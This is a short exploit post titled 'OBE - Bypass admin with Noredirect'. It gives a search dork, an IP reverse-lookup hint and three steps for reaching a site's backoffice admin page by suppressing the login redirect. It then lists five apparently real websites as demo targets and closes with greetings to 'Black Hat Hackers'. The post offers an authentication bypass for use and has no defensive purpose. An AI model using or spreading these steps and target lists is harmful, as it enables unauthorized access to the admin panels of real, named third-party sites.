# Exploit Title:OBE - Bypass admin with Noredirect 
# Date: 23/07/2020 
# Dork:inurl:/backoffice/login.php
# Exploit Author:H9xHacker
# Tested on:Linux

Reverse check bing.com

ip:72.55.140.20 backoffice/login.php OR ip:72.55.140.20 .php?id= (There are 95 domains hosted on this server).

open http://site.com/backoffice/login.php 

use NoRedirect tool & add http://site.com/backoffice/login.php 

then open http://site.com/backoffice/index.php

#Demo:
https://ilustracaosjm.pt/backoffice/login.php
https://www.abedigitalsolutions.com/backoffice/login.php
http://www.serial.pt/backoffice/login.php
https://www.plakamat.pt/backoffice/login.php
http://www.unicor.pt/backoffice/login.php


------------------------
Greets:Black Hat Hackers